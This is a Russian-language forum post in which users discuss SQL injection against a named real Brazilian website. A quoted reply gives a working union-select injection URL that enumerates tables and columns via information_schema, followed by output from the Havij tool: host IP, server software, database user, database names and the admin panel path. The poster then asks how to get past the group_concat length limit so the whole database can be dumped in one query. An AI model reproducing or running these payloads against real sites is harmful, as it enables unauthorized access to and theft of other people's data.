05.10.2015, 09:27
|
|
Познающий
Регистрация: 26.09.2015
Сообщений: 56
С нами:
5595446
Репутация:
5
|
|
Сообщение от SaNDER
↑
Не проще ли заинжектить прогой,хэвидж всё вывел .
Код:
Target: http://www.fimca.com.br/pagina.asp?id=-11%20union%20select%201,2,3,concat_ws%280x3a,table_name,column_name%29,5,6%20from%20information_schema.columns
Host IP: 191.252.45.189
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
DB Server: MySQL
Resp. Time(avg): 7342 ms
Current User: fimca@191.252.45.189
Sql Version: 5.1.54-rel12.6-log
Current DB: fimca
System User: fimca@191.252.45.189
Host Name: hm7092
Installation dir: /usr/
DB User: 'fimca'@'%'
Data Bases: information_schema
fimca
Админка в /admin,но без нужных прав не пустят(403 Forbbiden) .
Проще. Но хочется научиться и руками. Очень пригодится там, где проги не могут. И вопрос сюда же кину - возникло ограничение от group_concat в 1024 символа - его можно обойти? Что бы вообще все вытащить одним запросом? Или только лимитом перебирать по порядку - таблица, колонка, содержимое?
UPD. Закрыто, ниже frank ответил.
|
|
|